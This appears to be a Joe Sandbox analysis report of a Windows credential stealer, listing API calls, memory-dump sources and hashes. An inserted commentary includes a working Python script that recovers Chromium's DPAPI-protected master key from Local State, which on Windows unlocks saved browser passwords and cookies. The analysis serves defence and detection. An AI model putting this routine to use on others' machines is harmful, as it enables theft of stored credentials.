                                    • Part of subcall function 00A79AC0: LocalFree.KERNEL32(?,?,?,?,00A74EEE,00000000,?), ref: 00A79B3F
                                    • Part of subcall function 00A79B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A79B84
                                    • Part of subcall function 00A79B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A79BA3
                                    • Part of subcall function 00A79B60: LocalFree.KERNEL32(?), ref: 00A79BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 9ec0f8025d9c2202d566c1936a4a5084349d02d3862a417b6d027c51f07a0cc7
                                  • Instruction ID: 36e32b04ad6acf0512d915389b1551bdaba50706f5b7e296ecddd34c42d553e1
                                  • Opcode Fuzzy Hash: 9ec0f8025d9c2202d566c1936a4a5084349d02d3862a417b6d027c51f07a0cc7
                                  • Instruction Fuzzy Hash: CA3123B6D10109ABCF14EBE4DD85AEF77B8BF48304F14C559E905A7241FB349A04CBA1
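The function above is the Chromium master-key recovery routine found in most Windows stealers: read the browser's Local State file, scan for the literal "encrypted_key":" (StrStrA), base64-decode the value (CryptStringToBinaryA with CRYPT_STRING_BASE64, called twice: once for the length, once for the data), strip the 5-byte "DPAPI" tag, and hand the remainder to CryptUnprotectData. The script below reproduces that sequence so an analyst can see exactly what the blob looks like and why the decryption only works on the victim's own user session. It is an added illustration written for this report, not code from the sample or from Joe Sandbox; the Local State JSON and the DPAPI blob bytes embedded in it are constructed (the 20-byte blob header is the real DPAPI version/provider-GUID prefix, the rest is filler), and the ctypes wrapper is my own, not something the sample contains.

```python
"""Chromium "Local State" master-key recovery, step by step.

Added illustration for the report above; not code from the sample or from
Joe Sandbox. The sample performs the same steps with StrStrA ->
CryptStringToBinaryA (CRYPT_STRING_BASE64) -> strip "DPAPI" -> CryptUnprotectData.
"""
import base64
import sys
from typing import Callable, Optional

MARKER = '"encrypted_key":"'   # literal the sample searches for with StrStrA
DPAPI_TAG = b"DPAPI"           # 5-byte tag Chromium prepends to the DPAPI blob

# Constructed sample data (not taken from any real machine). A DPAPI blob
# starts with version 1 and the provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb
# in little-endian form; the trailing bytes here are filler standing in for the
# real ciphertext, MAC and master-key reference.
SAMPLE_BLOB = (
    bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
    + bytes(range(0x10, 0x30))
)
SAMPLE_LOCAL_STATE = (
    '{"os_crypt":{"encrypted_key":"'
    + base64.b64encode(DPAPI_TAG + SAMPLE_BLOB).decode()
    + '"},"profile":{"last_used":"Default"}}'
)


def extract_dpapi_blob(local_state_text: str) -> bytes:
    """Return the raw DPAPI blob wrapped inside os_crypt.encrypted_key.

    Mirrors the sample's literal-string scan rather than a JSON parse: find
    the marker, take the text up to the closing quote, base64-decode it and
    strip the leading "DPAPI" tag. Chromium writes Local State compactly, so
    the marker matches; a pretty-printed copy would not, which is one reason
    this scan is fragile and a real tool should parse the JSON instead.
    """
    start = local_state_text.find(MARKER)
    if start < 0:
        raise ValueError("no encrypted_key in Local State")
    start += len(MARKER)
    end = local_state_text.find('"', start)
    if end < 0:
        raise ValueError("unterminated encrypted_key value")
    decoded = base64.b64decode(local_state_text[start:end], validate=True)
    if not decoded.startswith(DPAPI_TAG):
        raise ValueError("encrypted_key is not DPAPI-wrapped")
    return decoded[len(DPAPI_TAG):]


def _win32_unprotect(blob: bytes) -> bytes:
    """CryptUnprotectData(&in, NULL, NULL, NULL, NULL, 0, &out) via ctypes.

    Succeeds only in the context of the user (and machine) that protected the
    blob, which is why stealers decrypt on the victim host instead of
    exfiltrating Local State and decrypting it elsewhere.
    """
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD),
                    ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(blob, len(blob))
    inp = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    out = DATA_BLOB()
    ok = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(inp), None, None, None, None, 0, ctypes.byref(out))
    if not ok:
        raise OSError(ctypes.GetLastError(), "CryptUnprotectData failed")
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(out.pbData)   # matches the LocalFree seen in the report


def recover_master_key(local_state_text: str,
                       unprotect: Optional[Callable[[bytes], bytes]] = None) -> bytes:
    """Run the whole sequence. `unprotect` defaults to the real Win32 call on
    Windows; pass a stand-in to exercise the parsing logic on other platforms."""
    blob = extract_dpapi_blob(local_state_text)
    if unprotect is None:
        if sys.platform != "win32":
            raise RuntimeError("CryptUnprotectData needs Windows; pass unprotect=")
        unprotect = _win32_unprotect
    return unprotect(blob)


if __name__ == "__main__":
    print("DPAPI blob:", extract_dpapi_blob(SAMPLE_LOCAL_STATE).hex())
```

On a Windows host the default path calls the real API and returns the 32-byte AES-256-GCM key that Chromium uses for the "v10"-prefixed values in its Login Data and Cookies databases; everywhere else pass a stand-in `unprotect` to exercise the parsing only. The DPAPI dependency is the useful defensive point: the blob in Local State is worthless off-host, so a stealer must run CryptUnprotectData under the victim account, and that call from an unexpected process is a practical detection hook.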
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A8508A
                                  • lstrcat.KERNEL32(?,0068E928), ref: 00A850A8
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A8492C
                                    • Part of subcall function 00A84910: FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                  • String ID: (h$h
                                  • API String ID: 2699682494-1439427960
                                  • Opcode ID: 7bb378e8aedfc6fa9eb8c2985c60d5e7da47cf6a437d824f98e879b2d7c20fec
                                  • Instruction ID: ce862ec0ff06f56288a128d73a6c93a64b7272b97cb6cb51677966919ded5c16
                                  • Opcode Fuzzy Hash: 7bb378e8aedfc6fa9eb8c2985c60d5e7da47cf6a437d824f98e879b2d7c20fec
                                  • Instruction Fuzzy Hash: 41019676900208A7CB54FB74DD42FEE737CAB64300F404694B68957191FE759AC88BE2
                                  APIs
                                  • CreateFileA.KERNEL32(00A83AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00A83AEE,?), ref: 00A892FC
                                  • GetFileSizeEx.KERNEL32(000000FF,00A83AEE), ref: 00A89319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00A89327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 0af03702c6cdeb3fea2acef252d16e6e60c45ab3e69e040fdd1bc176a96a9a47
                                  • Instruction ID: fc82391b506ddf4a1d6b168a2e102792f557205934ecea6d2fd611ee292b2a5d
                                  • Opcode Fuzzy Hash: 0af03702c6cdeb3fea2acef252d16e6e60c45ab3e69e040fdd1bc176a96a9a47
                                  • Instruction Fuzzy Hash: D8F04F75E44308BBDB10EFB0DC49FAE77B9EB48710F10C298B691AB2C0DA7096018B80
                                  APIs
                                  • __getptd.LIBCMT ref: 00A8C74E
                                    • Part of subcall function 00A8BF9F: __amsg_exit.LIBCMT ref: 00A8BFAF
                                  • __getptd.LIBCMT ref: 00A8C765
                                  • __amsg_exit.LIBCMT ref: 00A8C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00A8C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: bffa206c600463ddc5414ee2bfa2a813353caf3aef68829b48b6f2c9ce254e7f
                                  • Instruction ID: ec8cd911a568b135eb9aaf1143af4f980a9e8e1bad98f771e6007ccc42b0b8b0
                                  • Opcode Fuzzy Hash: bffa206c600463ddc5414ee2bfa2a813353caf3aef68829b48b6f2c9ce254e7f
                                  • Instruction Fuzzy Hash: D9F0B432A243109FD720BBB85A07B4D33A0AF00730F20414AF505A61D2DF745D419F7A
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84F7A
                                  • lstrcat.KERNEL32(?,00A91070), ref: 00A84F97
                                  • lstrcat.KERNEL32(?,00688A28), ref: 00A84FAB
                                  • lstrcat.KERNEL32(?,00A91074), ref: 00A84FBD
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A8492C
                                    • Part of subcall function 00A84910: FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FDC), ref: 00A84971
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FE0), ref: 00A84987
                                    • Part of subcall function 00A84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A84B7D
                                    • Part of subcall function 00A84910: FindClose.KERNEL32(000000FF), ref: 00A84B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: c4b6b95494901d8ee4a716ad85ab6c2839c3caca4f7145a657850e8ba44f0a10
                                  • Instruction ID: cbad6725c9f27393b961f62a730eee4d1247ea9fe8d6d460277ae6e40e633722
                                  • Opcode Fuzzy Hash: c4b6b95494901d8ee4a716ad85ab6c2839c3caca4f7145a657850e8ba44f0a10
                                  • Instruction Fuzzy Hash: 5921AA769002087BCB54FBB0DD46FED337CBB58700F404694B69993581EE759BC88BA2